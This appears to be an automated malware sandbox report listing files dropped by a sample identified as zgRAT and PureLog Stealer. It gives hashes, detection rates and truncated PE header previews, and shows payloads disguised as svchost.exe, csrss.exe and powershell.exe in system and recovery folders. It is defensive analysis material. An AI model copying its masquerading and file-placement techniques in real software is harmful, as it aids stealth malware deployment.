File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\Program Files\Windows Defender\en-US\7c80744c9cd64c

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (840), with no line terminators
Category:	dropped
Size (bytes):	840
Entropy (8bit):	5.898817119590833
Encrypted:	false
SSDEEP:	12:aQUm7TOa2dD4kfYOpBamo8dUksBfTRc7qwBQB+gGtDiRDSZDo1/MZTEoz//X9cHG:3P7qaQfYGInt5ftc7CBxCUle39cV8
MD5:	3956A9909D50028358B18837C986CF24
SHA1:	5DD3107FB1C20923261F50893962B350CFD31F6D
SHA-256:	3AE16B33F09D436CA509334F7CACEA9C5CA69E9A35961E0A0EF9B3EC24D15059
SHA-512:	4A772E293D66130140B16FCF299B16F8CD325F02FC36958F09B058876FECB92C2CBE3DCDAC45A759C9518AA289B9FB1FC0455861FF0EA4F5D3DB01E9DEAE9C22
Malicious:	false
Preview:	PBN13hss1NOMWovO88wTFasubLeSaAchtjcSAnkZhURy9bChw2kijruzTcarCZR1vqdwMcOVXXvvJ3vAI7fiZ38Bzm9hN2WHCaDS8PUUoPKL68qZraiF3tb1sb7kcqIfBnst0cB2mL4KtwF06k0xTQNT8LkgSu17GpKSP7jOYqcszRI5WHn20VLuZZup2fk1T6DDmwk8AlYnxfeqCpKKG9Hvda30M4W2FlZ2OETjgp1O6h645DmNVZuUzRjL3uwGPgiMGlc7VknbH3z6d94IRJhp0FD6eHqw2v8a9tyTlo1uwTM5cnr4znyG82WAifdO41iV4Z6uKlgnRw3g2He0Zv7P62bGXxvGLn04u1BDr7tOGLyM9zIaAmyI3TZB7zWXzaco58wBGbJbCtIvEOHhoVFizsAbb9F1lWZptJQADHUjcWFKKo7tszsdV3zN7VjGWR0qUcB48GehAfFcmzQxCVJwn5UzUCCsiOMKfZ0smCulULdzxWlHEvDAIEDYILk5Ew9wT46N9hLAlibbceC7b4nwKMCbWbkabygiMqg2aXIhkDZknl6nJneJIMlH2f1h7vixB3Ov8JgDvGMHxcyuf6QxUXZ9EZA4gljyeliuWLpAGaXCAdUarGBAevdndPqjJmhKgXnL3EXTRQq3AW9kEjNZjjTsI5QHfF0e3Ngm0JgntssOEjnGPFejZHk6E4C8xPyLZLAw0Xu5Cjq10FojRJ2ZlRFvmji5Gi0d3gz2j0Q1VigzbsF9QdqnXZkIGOKQzyzdtM7UPv9b3AECuQU3dipn2MGe6qwUqACgtCFOvvtfdPuWUhYz4QwQJMlhGdXj8pu38iTr

C:\Program Files\Windows Defender\en-US\based.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\en-US\based.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\en-US\based.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (633), with no line terminators
Category:	dropped
Size (bytes):	633
Entropy (8bit):	5.889029102231242
Encrypted:	false
SSDEEP:	12:tMaIt3iFUSgVk5IOZerfSqnQ63IaanL83DNQh0JSdS:iaItAI/TNnQ64aanL82h0d
MD5:	DA7294504AF2A6AE90F7DD0FA842B8B8
SHA1:	F27750ADBF2D8F87CDFBBA4EEEB6B255ACCE12DE
SHA-256:	6D2686DA3615379835AD07F8FD95098CD1606B8D5A50BE710FD77D0BDE8FD201
SHA-512:	A7E5D5BCF3FA66D95AAB61660570112C16429769C8780578AE17B7E0B504DE10993D6780A3A0C618E32925845A81F681307E856D605A89B7E2E7E700AAD8FD27
Malicious:	false
Preview:	ctJYS7aaNvWhbiIRXJgye0XwNroyHEaAC8EWT8RBOUqMMwPm70TqnVIlVXLkSlSIUWecev8Z2fjJKLkbbC1QuuXrzcA6xqtnCh10RwIL24xHv9bKxtJQtBXk8xmBvBlLw6HnTuJo4qXz6P50B0JDhc3AKR1eKGa1TmVz1x1DkeVDohnt1v942hnTCGdB2pexPggU3G8N8GdDHzWmnHmYHf8w8CwvUzK59iyHBT0uxw6wEkMNu0YvCGquitV0UN2J5hDiBOkUQ1lUjLsX0jBebY332DjR79aj3w0ggnLfPDeKfVKXB7AuMYshoKq7pTXQaBbwUL1MXfOX3sXg2LP99qWeET1W7Nz6qOtd3YC0GxWrKUo6xJEdDXRup6sBUfPJqSqp83meJZ2MTpUtp5ixJV2S79y7qAflhNA1n873gkUofEb9l8WY6cAUaXs9FpyI3QpGodGq8pQiBNx2hzVsoHpEMqbPQ7y1vLuOYVUI2qaQLbTMkzcPUGewlk38B0ZA1Zx0cjdMeMz8qZ2uXPpafigpr8nybWHCQZZwodtAWQvHQfFMrJlwK8fS2HIe6puIFxsRAGF4fpEPxZYL2aGSvV1R3G3gUPEqfmCcxyMlDqQe4Qfdt7lficXu6

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\ProgramData\Microsoft\based.exe

Download File

Process:	C:\Users\user\Desktop\8Ck8T5qRcC.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6127126
Entropy (8bit):	7.9895412495725076
Encrypted:	false
SSDEEP:	98304:J5+ki65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF0FeLkg4ke4U7Fj6:JUCDOYjJlpZstQoS9Hf12VKX9FeLwkys
MD5:	838A5BD59DE32F425938CBA6C119CBEE
SHA1:	3A789DD47202C524F4C10CF37B245174CF02A2F1
SHA-256:	75AFAAE3D0FBA0ECB6E25BE065B68A7D199186714DC6C615311491E66B781FA9
SHA-512:	71B38A9C2BD5A62F01B4B78B4CFCE368977E0A0945372BD33779FE5248E44A0FB1EEC015EFEB13FE3A057D80D20435B9AE04FB3D059E0F3BB525E44A19E268B0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...[..f.........."....(.....l.................@......................................]...`.................................................l...x.......4....`..."...Y].H$......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...4...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\hacn.exe

Download File

Process:	C:\Users\user\Desktop\8Ck8T5qRcC.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11662615
Entropy (8bit):	7.996772653002528
Encrypted:	true
SSDEEP:	196608:QCUDfyGowBdnpkYRMZqsrMELkmHe/tQK3j3fxIyAN7z7FUqVYwD7XmL:QDfDoc6Y6/km6GyxgN7zZFVr7X
MD5:	FC445049713C02F9A9DDAA62E404C9E9
SHA1:	8BCFA380451D9B71B4933E28C9FFB6710D12323E
SHA-256:	B39448F8013728D904A44A3FA4C510539D3FDD2AA35A1355D49E0343852A8556
SHA-512:	14C81AAD762CA16024A35799783F22D244FB88BCC350BEAC27E00CC54B36E822E5FDDDC7CAE414A8A08ED93E2BB93F765C4D2CB3869D552003F9F80B4AD869C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....+.f.........."....%.....p.................@....................................b%....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................

C:\ProgramData\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4042529
Entropy (8bit):	7.700603596238004
Encrypted:	false
SSDEEP:	98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
MD5:	45C59202DCE8ED255B4DBD8BA74C630F
SHA1:	60872781ED51D9BC22A36943DA5F7BE42C304130
SHA-256:	D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
SHA-512:	FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Recovery\7963a3365bd9f9

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (990), with no line terminators
Category:	dropped
Size (bytes):	990
Entropy (8bit):	5.907377483651261
Encrypted:	false
SSDEEP:	24:sqOazWF0VtppiYQlFmvjPb2svJ3Z2KxNrX:MyjLQlcv3LhXNr
MD5:	FAEDE394B1FCB286F23D0D4033A06B2A
SHA1:	FEFD8E6567C3B8ADC53D62058B87F3A9DF381B85
SHA-256:	607CBCFFE6388D4B3485B8EDD7124F816D281C5EDF41B234436CADE5A23CC738
SHA-512:	BF0030992D894EBA1D18C1A41CEDEE4AA70AC4095E8251ECEA1CD064C1833D5DB7E5B3F5CC70B32A0C4CF8AF6DFD30AD7B43CC097AC5CFF3E38A06A22C46A2CE
Malicious:	false
Preview:	Ks1hn15XtkAM2lpbUCOSORGG6MaJcBxrOCPY1m5uQzrRprDKf5OWYbu2mulaav4rwT70VQkrGeCZkybPJQnhwaTxRWwGBeTe49eVuMyPUhP3ZVSxTWRKIX4WAKi9eeqlLhfkTFe6bYMPLZX6E9wpNIWgFIVkozu01ns10sdN1UstLpLkwm4frAYCL8fLu4SmnVYhrfFVfjx2amVa7uxB4PJ0Ppq1NRd6CGGzQn3Qgj9HMfmjnEOAHQrXMhRBzNING10TgfJT0geVQBntDHOIDczvYsmsV2bSavBVpSDH54JkvVHL4h7s99JnCE4x3a78FM5e9SEvDHMJTO9Ckbyx4tTamYTkXPNf6KfjanLldLo1wATxE2NclJDW2e2l9dYy4rMJtam7PNUtEcnlEfgfCv3wGJr6vjm9wz7FxKEoPQMYzURa0Qhd73wIxaCjspMpkV6Peiy3a2Pwjf7v1RGeCIB3DyRXIf5kEgxdYC5RboDFoAjScQrbjrncTCLpQbu56osCseXzWyDXF6PCP941xeBW3VJV0PBA3HJ9Sgj831EvoPWXxJaRg2IbnVJWUB9GxCe8xPusZ585ZPsn9whrztdA9sV7XMo1288lvYkhYr1k4MBYmfXhdSRDid9E4xVNRGDbRH2kMASH23Gwq7V1yGXjq4DRYfnlVnSxJjGemxVdAJKpWMY7bdYLtdvWEkMqXqwOkTmH10PBu4jguY4LHpK2PHEqytaBlpGUX5EDkQGlOWby3OmqpAjrg39dP5SHZNaExPJzT1l0jin2qPwkHuWkGZyd5lyo88LB6WBoFwWyYsH7QHw9JsAp1z8Ybp3rD62lXm6TOHfUXhMXS0NyyyfQ7fKGXmNZ3pvb0fknKdvBMqSTnlGkbE3Obmn1cz6l3FasvuhwQjnVDdDRN0cvgn7ywhAO1sLUgJHGPjh3EUU2ahL8iWnmXKFQIm6OtT4hYTy3V6BoSjrMTFYOVBpfFj7WE18nnS

C:\Recovery\HpQPPZazcv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Recovery\e978f868350d50

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	131
Entropy (8bit):	5.481214414030158
Encrypted:	false
SSDEEP:	3:ELLuGiacldEWw6xEl7O8o0PgVQhbIm3n:EncjEWw6068tPgAv3
MD5:	CF97347593F55820BE9C2381B2EA0852
SHA1:	3F79A59D03C7DE056D89C5A00DBD0F0A0FE9D923
SHA-256:	3BE9909C7AB94E81DB59BF6A7CB53E9B0C3E46501C4095BE8AA4E2958E7E3436
SHA-512:	211C9D758C81AFDDA79BBBCF91C047ADFEA4F23558A7F0345A627CA2A45F0ED22F48E1CAB78A04A2E0676F1AA8830BE733A202A01985D1CC4D2B2EF734376428
Malicious:	false
Preview:	sSmlV9Txc37DOr3snZczVcye8XA9Z6wglQfDZEJGPJ3L35Z5ZbHAUowQdIn78TXgGab7MzTjPVjLjnkD8Fk8ywM6ePjQbMH5wWFddbtjIiu8Fkr0ij83tZsUOed7QCICNnZ

C:\Recovery\powershell.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\powershell.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\powershell.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainComServermonitor.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:	0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:	666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:	0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:	4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HpQPPZazcv.exe.log

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\0iBAZ9f35D

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
